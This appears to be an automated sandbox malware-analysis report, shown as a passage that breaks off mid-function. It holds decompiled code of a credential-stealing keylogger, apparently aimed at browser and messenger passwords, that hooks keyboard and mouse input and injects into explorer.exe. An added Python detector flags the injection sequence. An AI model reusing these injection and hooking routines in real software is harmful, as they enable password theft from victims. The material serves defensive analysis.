                                    • String ID: FIREFOX.abc$IEAUTO.abc$IELOGIN.abc$IEPASS.abc$IEWEB.abc$MSN.abc$NOIP.abc$Restart$XX--XX--XX.txt$_x_X_BLOCKMOUSE_X_x_$_x_X_PASSWORDLIST_X_x_$_x_X_UPDATE_X_x_
                                    • API String ID: 3001352634-1131808598
                                    • Opcode ID: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction ID: bdf70af56670c6b0a4a77e5acd908e49726916f33cb45a25643fdd496cb3d72a
                                    • Opcode Fuzzy Hash: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction Fuzzy Hash: 36C10130640244EADB10FBA6DC82B9D77689F45309F50453BF501BB2E2DB7CAE45CAAD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E0040B3C0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                    				long _v8;
                                    				char _v12;
                                    				struct _PROCESS_INFORMATION _v28;
                                    				struct _STARTUPINFOA _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				intOrPtr _t58;
                                    				intOrPtr* _t60;
                                    				intOrPtr* _t61;
                                    				char* _t62;
                                    				intOrPtr* _t71;
                                    				intOrPtr _t91;
                                    				intOrPtr* _t99;
                                    				void* _t104;
                                    				intOrPtr* _t113;
                                    				intOrPtr* _t119;
                                    				intOrPtr* _t124;
                                    				intOrPtr _t129;
                                    				intOrPtr* _t137;
                                    				void* _t142;
                                    				intOrPtr* _t151;
                                    				intOrPtr _t159;
                                    				char* _t161;
                                    				struct HWND__* _t163;
                                    				void* _t168;
                                    				intOrPtr _t197;
                                    				intOrPtr _t201;
                                    				intOrPtr _t210;
                                    				intOrPtr _t221;
                                    				void* _t236;
                                    				void* _t239;
                                    				void* _t241;
                                    
                                    				_t234 = __edi;
                                    				_t194 = __ecx;
                                    				_t185 = __ebx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v116 = 0;
                                    				_v112 = 0;
                                    				_v108 = 0;
                                    				_v104 = 0;
                                    				_v100 = 0;
                                    				_push(_t239);
                                    				_push(0x40b7a8);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t239 + 0xffffff90;
                                    				_t58 =  *0x40d1cc; // 0x40e924
                                    				_t236 = E00401F9C(_t58);
                                    				_t60 =  *0x40d210; // 0x40e8ec
                                    				_t241 =  *_t60 - 2;
                                    				if(_t241 != 0) {
                                    					_t61 =  *0x40d210; // 0x40e8ec
                                    					__eflags =  *_t61 - 1;
                                    					if(__eflags != 0) {
                                    						_t62 =  *0x40d1b8; // 0x40e8fc
                                    						__eflags =  *_t62 - 1;
                                    						if( *_t62 == 1) {
                                    							__eflags = 0;
                                    							E004013A4(0,  &_v116);
                                    							E00401E94( *0x40f1e8, _v116);
                                    							if(__eflags != 0) {
                                    								_t194 = E00401F48( *0x40f1e8);
                                    								__eflags = 0;
                                    								E00405AD8(0, _t85, "open", 0, 0x40b7f0, 0x40b7f0);
                                    								E0040AFB0(__ebx, _t85, _t236, 0);
                                    								ExitProcess(0);
                                    							}
                                    						}
                                    						_t197 =  *0x40d21c; // 0x40e8f0
                                    						__eflags = 0;
                                    						E004013A4(0, _t197);
                                    						E00403738();
                                    						E00403738();
                                    						_t71 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t71), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					} else {
                                    						E00406294( &_v112, __ebx, __edi, _t236, __eflags);
                                    						_t91 =  *0x40d21c; // 0x40e8f0
                                    						E00401B14(_t91, _v112);
                                    						E00403738();
                                    						E00403738();
                                    						_t99 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t99), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						_t104 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						__eflags = _t104;
                                    						if(_t104 == 0) {
                                    							_t210 =  *0x40d21c; // 0x40e8f0
                                    							E004013A4(0, _t210);
                                    							E00403738();
                                    							E00403738();
                                    							_t113 =  *0x40d21c; // 0x40e8f0
                                    							CreateProcessA(E00401F48( *_t113), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    							E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						}
                                    					}
                                    				} else {
                                    					_t119 =  *0x40d21c; // 0x40e8f0
                                    					E004047C4( *_t119, __ebx,  &_v100, __edi, _t236, _t241);
                                    					E00401E94(_v100, "explorer.exe");
                                    					if(_t241 != 0) {
                                    						_t124 =  *0x40d21c; // 0x40e8f0
                                    						__eflags = E004064DC( *_t124, __ebx,  &_v12, __edi, _t236, __eflags) - 1;
                                    						if(__eflags != 0) {
                                    							E00406294( &_v108, _t185, __edi, _t236, __eflags);
                                    							_t129 =  *0x40d21c; // 0x40e8f0
                                    							E00401B14(_t129, _v108);
                                    						} else {
                                    							E004063FC(_v12,  &_v104);
                                    							_t159 =  *0x40d21c; // 0x40e8f0
                                    							E00401B14(_t159, _v104);
                                    						}
                                    						E00403738();
                                    						E00403738();
                                    						_t137 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t137), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					} else {
                                    						_t161 =  *0x40d214; // 0x40e8f4
                                    						if( *_t161 != 1) {
                                    							_t163 = FindWindowA("shell_traywnd", 0); // executed
                                    							GetWindowThreadProcessId(_t163,  &_v8);
                                    							_t168 = E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t166, _t194, _t236, __edi, _t236); // executed
                                    							__eflags = _t168;
                                    							if(_t168 != 0) {
                                    								_t142 = 1;
                                    							} else {
                                    								E00403738();
                                    								E00403738();
                                    								CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28); // executed
                                    								_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236); // executed
                                    							}
                                    						} else {
                                    							E00403738();
                                    							E00403738();
                                    							CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    							_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						}
                                    					}
                                    					if(_t142 == 0) {
                                    						_t221 =  *0x40d21c; // 0x40e8f0
                                    						E004013A4(0, _t221);
                                    						E00403738();
                                    						E00403738();
                                    						_t151 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t151), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					}
                                    				}
                                    				_pop(_t201);
                                    				 *[fs:eax] = _t201;
                                    				_push(E0040B7AF);
                                    				return E00401AE4( &_v116, 5);
}

Instruction address column (0x0040b3c0 onward) for the decompiled lines above: extracted as a separate column with no alignment to the code lines, not reproduced here.
                                    0x0040b46e
                                    0x0040b42b
                                    0x0040b594
                                    0x0040b59a
                                    0x0040b5a2
                                    0x0040b5af
                                    0x0040b5bc
                                    0x0040b5da
                                    0x0040b5e7
                                    0x0040b5f3
                                    0x0040b5f3
                                    0x0040b594
                                    0x0040b78f
                                    0x0040b792
                                    0x0040b795
                                    0x0040b7a7

                                    APIs
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B462
                                      • Part of subcall function 004040F4: VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                      • Part of subcall function 004040F4: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                      • Part of subcall function 004040F4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                      • Part of subcall function 004040F4: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    • FindWindowA.USER32(shell_traywnd,00000000), ref: 0040B483
                                    • GetWindowThreadProcessId.USER32(00000000,shell_traywnd), ref: 0040B489
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,shell_traywnd,00000000,?,00000000,0040B7A8), ref: 0040B499
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,shell_traywnd,00000000), ref: 0040B4E2
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B581
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B5E7
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B660
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B6C6
                                      • Part of subcall function 004047C4: CharLowerA.USER32(?,00000000,00404839), ref: 00404802
                                    • ExitProcess.KERNEL32(00000000,00000000,0040B7A8), ref: 0040B72A
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B77C
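                                    The API list above is the textbook remote-injection sequence: CreateProcessA with dwCreationFlags 0x00000004 (CREATE_SUSPENDED) for explorer.exe, a VirtualAllocEx with flAllocationType 0x3000 (MEM_COMMIT | MEM_RESERVE) and flProtect 0x40 (PAGE_EXECUTE_READWRITE) followed by WriteProcessMemory, and OpenProcess with 0x001F0FFF (PROCESS_ALL_ACCESS) on the PID that owns the Shell_TrayWnd taskbar window. The Python below is an added example, not part of the sandbox report or of the sample: it parses trace lines in the report's own "Api.MODULE(args), ref: ADDR" format and flags that pattern. The embedded trace lines are copied from the list above; the rule names and the combination logic are the example's own assumptions, not Joe Sandbox detection logic.

```python
"""Flag the remote-injection sequence visible in a sandbox API trace.

The trace text below is copied from the report's APIs list; the detection
rules are an added example, not Joe Sandbox logic.
"""
import re

TRACE = """\
CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B462
Part of subcall function 004040F4: VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
Part of subcall function 004040F4: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
Part of subcall function 004040F4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
Part of subcall function 004040F4: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
FindWindowA.USER32(shell_traywnd,00000000), ref: 0040B483
GetWindowThreadProcessId.USER32(00000000,shell_traywnd), ref: 0040B489
OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,shell_traywnd,00000000,?,00000000,0040B7A8), ref: 0040B499
ExitProcess.KERNEL32(00000000,00000000,0040B7A8), ref: 0040B72A
"""

# One trace line: optional "Part of subcall function XXXX: " prefix, then
# Api.MODULE(arg,arg,...), ref: ADDR. The sandbox prints stack slots past the
# API's real arity, so only the leading positional arguments are trusted.
LINE_RE = re.compile(
    r"^(?:Part of subcall function [0-9A-Fa-f]+: )?"
    r"(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$"
)

CREATE_SUSPENDED = 0x00000004        # CreateProcess dwCreationFlags
MEM_COMMIT = 0x00001000              # VirtualAllocEx flAllocationType
PAGE_EXECUTE_READWRITE = 0x00000040  # VirtualAllocEx flProtect
PROCESS_ALL_ACCESS = 0x001F0FFF      # OpenProcess dwDesiredAccess


def parse_trace(text):
    """Return a list of {'api','module','args','ref'} dicts, skipping non-trace lines."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = LINE_RE.match(line)
        if not m:
            continue
        api, module, argstr, ref = m.groups()
        calls.append({"api": api, "module": module,
                      "args": argstr.split(",") if argstr else [], "ref": ref})
    return calls


def hexarg(args, i):
    """args[i] as an int; None when the slot is absent, '?' (unresolved) or a string."""
    if i >= len(args):
        return None
    try:
        return int(args[i], 16)
    except ValueError:
        return None


def analyse(calls):
    """Score the trace for the suspended-process / remote RWX write-in pattern."""
    findings = []
    targets = []
    alloc_rwx = wrote = False
    for c in calls:
        api, a, ref = c["api"], c["args"], c["ref"]
        if api.startswith("CreateProcess"):
            flags = hexarg(a, 5)
            if flags is not None and flags & CREATE_SUSPENDED:
                # lpCommandLine (arg 1) names the image when lpApplicationName (arg 0) is NULL
                target = a[1] if hexarg(a, 0) == 0 else a[0]
                targets.append(target)
                findings.append(f"{ref}: {api} launches {target} with CREATE_SUSPENDED")
        elif api == "VirtualAllocEx":
            atype, prot = hexarg(a, 3), hexarg(a, 4)
            if prot == PAGE_EXECUTE_READWRITE and atype is not None and atype & MEM_COMMIT:
                alloc_rwx = True
                findings.append(f"{ref}: VirtualAllocEx commits PAGE_EXECUTE_READWRITE memory in a remote process")
        elif api == "WriteProcessMemory":
            wrote = True
            findings.append(f"{ref}: WriteProcessMemory into a foreign process")
        elif api == "OpenProcess" and hexarg(a, 0) == PROCESS_ALL_ACCESS:
            findings.append(f"{ref}: OpenProcess with PROCESS_ALL_ACCESS")
        elif api.startswith("FindWindow") and a and a[0].lower() == "shell_traywnd":
            findings.append(f"{ref}: resolves explorer.exe via its Shell_TrayWnd taskbar window")
    injection = bool(targets) and alloc_rwx and wrote
    return {"remote_injection": injection, "targets": targets, "findings": findings}


if __name__ == "__main__":
    result = analyse(parse_trace(TRACE))
    for f in result["findings"]:
        print(f)
    print("remote injection pattern:", result["remote_injection"])
```

                                    The combination rule (suspended child plus a committed RWX region plus a remote write) is deliberately stricter than any single call: a legitimate debugger or installer may do one of these, but rarely all three against explorer.exe. Unresolved argument slots printed as "?" are treated as unknown rather than as zero so that a missing value never satisfies a flag check.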
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Create$Virtual$AllocWindow$CharExitFindFreeLowerMemoryOpenThreadWrite
                                    • String ID: $@$explorer.exe$explorer.exe$open$shell_traywnd$@
                                    • API String ID: 3531647898-832551239
                                    • Opcode ID: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction ID: 1ef0f6496c909ed0c3779ef052ced8ab034a7c85da5a6e5c6a5d2eb73cd655db
                                    • Opcode Fuzzy Hash: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction Fuzzy Hash: 79B114B4B402086BD710EBE5CC42F9E77A9EB48704F50847BB600BB2D5D778E906979D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			_entry_(void* __eflags, void* __fp0) {
                                    				char _v24;
                                    				char _v28;
                                    				signed int _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v128;
                                    				void* _t64;
                                    				void* _t65;
                                    				signed int _t66;
                                    				intOrPtr _t67;
                                    				intOrPtr _t68;
                                    				signed int _t70;
                                    				signed int _t71;
                                    				unsigned int _t72;
                                    				char _t82;
                                    				signed char* _t84;
                                    				long _t85;
                                    				char* _t88;
                                    				void* _t92;
                                    				long _t93;
                                    				void* _t95;
                                    				void* _t98;
                                    				intOrPtr* _t108;
                                    				void* _t111;
                                    				long _t112;
                                    				char* _t123;
                                    				intOrPtr* _t136;
                                    				long _t140;
                                    				intOrPtr* _t143;
                                    				long _t147;
                                    				intOrPtr* _t150;
                                    				long _t154;
                                    				struct HINSTANCE__* _t157;
                                    				struct HINSTANCE__* _t160;
                                    				signed int _t163;
                                    				signed int _t255;
                                    				signed int _t259;
                                    				signed int _t260;
                                    				signed int _t261;
                                    				signed int _t262;
                                    				void* _t266;
                                    				void* _t267;
                                    				void* _t268;
                                    				void* _t269;
                                    				char* _t271;
                                    				signed int _t272;
                                    				signed int _t274;
                                    				void* _t277;
                                    				void* _t278;
                                    				void* _t279;
                                    				void* _t280;
                                    				void* _t281;
                                    				void* _t282;
                                    				void* _t283;
                                    				intOrPtr* _t285;
                                    				intOrPtr _t291;
                                    				signed int _t316;
                                    				unsigned int* _t317;
                                    				CHAR* _t319;
                                    				void* _t320;
                                    				char* _t321;
                                    				signed int _t322;
                                    				unsigned int* _t323;
                                    				signed int _t324;
                                    				struct HINSTANCE__* _t325;
                                    				unsigned int _t326;
                                    				intOrPtr _t327;
                                    				DWORD* _t328;
                                    				intOrPtr _t329;
                                    				void* _t330;
                                    				signed int _t332;
                                    				void* _t335;
                                    
                                    				_t335 = __fp0;
                                    				_t330 = __eflags;
                                    				asm("pushad");
                                    				_t322 = 0x412000;
                                    				_t1 = _t322 - 0x11000; // 0x401000
                                    				_t316 = _t1;
                                    				_push(_t316);
                                    				_t325 = _t324 | 0xffffffff;
                                    				while(1) {
                                    					_t259 =  *_t322;
                                    					_t322 = _t322 - 0xfffffffc;
                                    					asm("adc ebx, ebx");
                                    					do {
                                    						if(_t330 < 0) {
                                    							_t64 =  *_t322;
                                    							_t322 = _t322 + 1;
                                    							 *_t316 = _t64;
                                    							_t316 = _t316 + 1;
                                    							__eflags = _t316;
                                    							goto L47;
                                    						}
                                    						_t65 = 1;
                                    						while(1) {
                                    							_t260 = _t259 + _t259;
                                    							if(_t260 == 0) {
                                    								_t260 =  *_t322;
                                    								_t322 = _t322 - 0xfffffffc;
                                    								asm("adc ebx, ebx");
                                    							}
                                    							asm("adc eax, eax");
                                    							_t261 = _t260 + _t260;
                                    							_t332 = _t261;
                                    							if(_t332 >= 0) {
                                    								goto L56;
                                    							}
                                    							L54:
                                    							if(_t332 != 0) {
                                    								L62:
                                    								_t272 = 0;
                                    								_t66 = _t65 - 3;
                                    								__eflags = _t66;
                                    								if(_t66 < 0) {
                                    									_t261 = _t261 + _t261;
                                    									__eflags = _t261;
                                    									if(__eflags == 0) {
                                    										_t261 =  *_t322;
                                    										_t322 = _t322 - 0xfffffffc;
                                    										asm("adc ebx, ebx");
                                    									}
                                    									L67:
                                    									if(__eflags < 0) {
                                    										L59:
                                    										_t259 = _t261 + _t261;
                                    										__eflags = _t259;
                                    										if(_t259 == 0) {
                                    											_t259 =  *_t322;
                                    											_t322 = _t322 - 0xfffffffc;
                                    											asm("adc ebx, ebx");
                                    										}
                                    										asm("adc ecx, ecx");
                                    										L77:
                                    										__eflags = _t325 - 0xfffffb00;
                                    										asm("adc ecx, 0x2");
                                    										_t285 = _t325 + _t316;
                                    										__eflags = _t325 - 0xfffffffc;
                                    										if(_t325 <= 0xfffffffc) {
                                    											do {
                                    												_t67 =  *_t285;
                                    												_t285 = _t285 + 4;
                                    												 *_t316 = _t67;
                                    												_t316 = _t316 + 4;
                                    												_t272 = _t272 - 4;
                                    												__eflags = _t272;
                                    											} while (_t272 > 0);
                                    											_t316 = _t316 + _t272;
                                    											break;
                                    										} else {
                                    											goto L78;
                                    										}
                                    										do {
                                    											L78:
                                    											_t68 =  *_t285;
                                    											_t285 = _t285 + 1;
                                    											 *_t316 = _t68;
                                    											_t316 = _t316 + 1;
                                    											_t272 = _t272 - 1;
                                    											__eflags = _t272;
                                    										} while (_t272 != 0);
                                    										break;
                                    									}
                                    									_t272 = _t272 + 1;
                                    									_t261 = _t261 + _t261;
                                    									__eflags = _t261;
                                    									if(__eflags == 0) {
                                    										_t261 =  *_t322;
                                    										_t322 = _t322 - 0xfffffffc;
                                    										asm("adc ebx, ebx");
                                    									}
                                    									if(__eflags < 0) {
                                    										goto L59;
                                    									} else {
                                    										goto L71;
                                    										do {
                                    											do {
                                    												L71:
                                    												_t262 = _t261 + _t261;
                                    												__eflags = _t262;
                                    												if(_t262 == 0) {
                                    													_t262 =  *_t322;
                                    													_t322 = _t322 - 0xfffffffc;
                                    													asm("adc ebx, ebx");
                                    												}
                                    												asm("adc ecx, ecx");
                                    												_t261 = _t262 + _t262;
                                    												__eflags = _t261;
                                    											} while (__eflags >= 0);
                                    											if(__eflags != 0) {
                                    												break;
                                    											}
                                    											_t261 =  *_t322;
                                    											_t322 = _t322 - 0xfffffffc;
                                    											__eflags = _t322;
                                    											asm("adc ebx, ebx");
                                    										} while (_t322 >= 0);
                                    										_t272 = _t272 + 2;
                                    										__eflags = _t272;
                                    										goto L77;
                                    									}
                                    								}
                                    								_t70 =  *_t322;
                                    								_t322 = _t322 + 1;
                                    								_t71 = _t70 ^ 0xffffffff;
                                    								__eflags = _t71;
                                    								if(__eflags == 0) {
                                    									_pop(_t323);
                                    									_t317 = _t323;
                                    									goto L83;
                                    									do {
                                    										do {
                                    											L83:
                                    											_t72 =  *_t317;
                                    											_t317 =  &(_t317[0]);
                                    											__eflags = _t72 - 0xe8 - 1;
                                    										} while (_t72 - 0xe8 > 1);
                                    										__eflags =  *_t317 - 1;
                                    									} while ( *_t317 != 1);
                                    									asm("rol eax, 0x10");
                                    									 *_t317 = ( *_t317 >> 8) - _t317 + _t323;
                                    									__eflags =  &(_t317[1]);
                                    									asm("loop 0xffffffdb");
                                    									_t50 =  &(_t323[0x13c00]); // 0x450000
                                    									_t319 = _t50;
                                    									while(1) {
                                    										L86:
                                    										_t82 =  *_t319;
                                    										__eflags = _t82;
                                    										if(_t82 == 0) {
                                    											break;
                                    										}
                                    										_t51 =  &(_t319[4]); // 0xf1ec
                                    										_t271 = _t323 +  *_t51;
                                    										_t321 =  &(_t319[8]);
                                    										__eflags = _t321;
                                    										_t325 = LoadLibraryA( &(_t323[0x156c2]) + _t82);
                                    										while(1) {
                                    											_t319 =  &(_t321[1]);
                                    											_t255 =  *_t321;
                                    											__eflags = _t255;
                                    											if(_t255 == 0) {
                                    												goto L86;
                                    											}
                                    											asm("repne scasb");
                                    											_t82 = GetProcAddress(_t325, _t319);
                                    											__eflags = _t82;
                                    											if(_t82 == 0) {
                                    												ExitProcess();
                                    											}
                                    											 *_t271 = _t82;
                                    											_t271 =  &(_t271[4]);
                                    										}
                                    									}
                                    									_t326 = _t323[0x156f6];
                                    									_t59 = _t323 - 0x1000; // 0x400000
                                    									_t320 = _t59;
                                    									VirtualProtect(_t320, 0x1000, 4, _t328); // 4 = PAGE_READWRITE: make the 4 KiB PE header page at 0x400000 writable
                                    									_t60 = _t320 + 0x21f; // 0x40021f
                                    									_t84 = _t60;
                                    									 *_t84 =  *_t84 & 0x0000007f;
                                    									_t61 =  &(_t84[0x28]);
                                    									 *_t61 = _t84[0x28] & 0x0000007f;
                                    									__eflags =  *_t61;
                                    									_t85 = _t82;
                                    									_push(_t85);
                                    									VirtualProtect(_t320, 0x1000, _t85, _t328); // executed
                                    									asm("popad");
                                    									_t88 =  &_v128;
                                    									do {
                                    										_push(0);
                                    										__eflags = _t328 - _t88;
                                    									} while (_t328 != _t88);
                                    									_t329 = _t328 - 0xffffff80;
                                    									_push(_t326);
                                    									_t327 = _t329;
                                    									_t274 = 0xb;
                                    									do {
                                    										_push(0);
                                    										_push(0);
                                    										_t274 = _t274 - 1;
                                    										__eflags = _t274;
                                    									} while (_t274 != 0);
                                    									_push(0x1000);
                                    									E00403418(0x40bb04);
                                    									_push(_t327);
                                    									_push(0x40c0c4);
                                    									_push( *[fs:eax]);
                                    									 *[fs:eax] = _t329;
                                    									_t92 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
                                    									_t266 = _t92;
                                    									_t93 = GetLastError();
                                    									__eflags = _t93 - 0xb7;
                                    									if(_t93 != 0xb7) { // 0xb7 = ERROR_ALREADY_EXISTS: another instance already owns the "_x_X_UPDATE_X_x_" object
                                    										CloseHandle(_t266); // executed
                                    									} else {
                                    										CloseHandle(_t266);
                                    										Sleep(0x2ee0); // 12000 ms
                                    									}
                                    									_t95 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
                                    									_t267 = _t95;
                                    									__eflags = GetLastError() - 0xb7; // ERROR_ALREADY_EXISTS check for "_x_X_PASSWORDLIST_X_x_"
                                    									if(__eflags != 0) {
                                    										CloseHandle(_t267);
                                    										_t98 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
                                    										_t268 = _t98;
                                    										__eflags = GetLastError() - 0xb7; // ERROR_ALREADY_EXISTS check for "_x_X_BLOCKMOUSE_X_x_"
                                    										if(__eflags != 0) {
                                    											CloseHandle(_t268);
                                    											L27:
                                    											E004013A4(1,  &_v80);
                                    											_t287 = "Restart";
                                    											E00401E94(_v80, "Restart");
                                    											if(__eflags != 0) {
                                    												Sleep(0x3e8); // executed
                                    											}
                                    											E00404604(_t274, __eflags);
                                    											E0040491C();
                                    											E0040B118(_t287, _t320, _t323);
                                    											_t108 =  *0x40d204; // 0x40e8f8
                                    											_t111 = E00403568(0, 0, E00401F48( *_t108)); // executed
                                    											_t269 = _t111;
                                    											_t112 = GetLastError();
                                    											__eflags = _t112 - 0xb7;
                                    											if(_t112 != 0xb7) {
                                    												CloseHandle(_t269); // executed
                                    											} else {
                                    												CloseHandle(_t269);
                                    												Sleep(0x3e8);
                                    												_t136 =  *0x40d204; // 0x40e8f8
                                    												_t269 = E00403568(0, 0, E00401F48( *_t136));
                                    												_t140 = GetLastError();
                                    												__eflags = _t140 - 0xb7;
                                    												if(_t140 != 0xb7) {
                                    													CloseHandle(_t269);
                                    												} else {
                                    													CloseHandle(_t269);
                                    													Sleep(0x3e8);
                                    													_t143 =  *0x40d204; // 0x40e8f8
                                    													_t269 = E00403568(0, 0, E00401F48( *_t143));
                                    													_t147 = GetLastError();
                                    													__eflags = _t147 - 0xb7;
                                    													if(_t147 != 0xb7) {
                                    														CloseHandle(_t269);
                                    													} else {
                                    														CloseHandle(_t269);
                                    														Sleep(0x3e8);
                                    														_t150 =  *0x40d204; // 0x40e8f8
                                    														_t269 = E00403568(0, 0, E00401F48( *_t150));
                                    														_t154 = GetLastError();
                                    														__eflags = _t154 - 0xb7;
                                    														if(_t154 != 0xb7) {
                                    															CloseHandle(_t269);
                                    														} else {
                                    															ExitProcess(0); // fourth consecutive ERROR_ALREADY_EXISTS (1 s apart): give up
                                    														}
                                    													}
                                    												}
                                    											}
                                    											__eflags =  *((char*)( *0x40d1dc)) - 1;
                                    											if( *((char*)( *0x40d1dc)) != 1) {
                                    												__eflags = 0;
                                    												E004013A4(0, 0x40f1e8);
                                    											} else {
                                    												E004013A4(0,  &_v88);
                                    												E00406B54(_v88, _t269,  &_v84, _t320, _t323); // executed
                                    												E00401B14(0x40f1e8, _v84);
                                    											}
                                    											E00406008( &_v92);
                                    											E00401D58( &_v92, "XX--XX--XX.txt");
                                    											E0040B93C( *0x40f1e8, _t269, _v92, _t320, _t323, __eflags);
                                    											_t123 =  *0x40d214; // 0x40e8f4
                                    											__eflags =  *_t123 - 1;
                                    											if(__eflags == 0) {
                                    												E0040B7FC(_t269, _t320, _t323, __eflags);
                                    												Sleep(0x3e8); // executed
                                    											}
                                    											E0040B3C0(_t269, _t274, _t320, _t323); // executed
                                    											L44:
                                    											__eflags = 0;
                                    											_pop(_t291);
                                    											 *[fs:eax] = _t291;
                                    											_push(0x40c0cb);
                                    											return E00401AE4( &_v92, 0x12);
                                    										}
                                    										CloseHandle(_t268);
                                    										_t157 =  *0x40e670; // 0x400000
                                    										SetWindowsHookExA(0xd, E0040B0B8, _t157, 0);
                                    										_t160 =  *0x40e670; // 0x400000
                                    										SetWindowsHookExA(0xe, E0040B108, _t160, 0);
                                    										while(1) {
                                    											_t163 = E0040BA84(__eflags);
                                    											__eflags = _t163;
                                    											if(_t163 != 0) {
                                    												break;
                                    											}
                                    											E00405918();
                                    										}
                                    										ExitProcess(0);
                                    										goto L27;
                                    									}
                                    									CloseHandle(_t267);
                                    									E00409AD4( &_v24, _t267, _t323, __eflags);
                                    									E00401B14(0x40f1ec, _v24);
                                    									__eflags =  *0x40f1ec;
                                    									if( *0x40f1ec != 0) {
                                    										_push(E00401D50( *0x40f1ec));
                                    										E00406008( &_v28);
                                    										E00401D58( &_v28, "NOIP.abc");
                                    										_pop(_t283);
                                    										E00405D70(_v28, _t267, _t283,  *0x40f1ec, _t323, __eflags);
                                    									}
                                    									E00409D28( &_v32, _t267, _t320, _t323);
                                    									_t297 = _v32;
                                    									E00401B14(0x40f1ec, _v32);
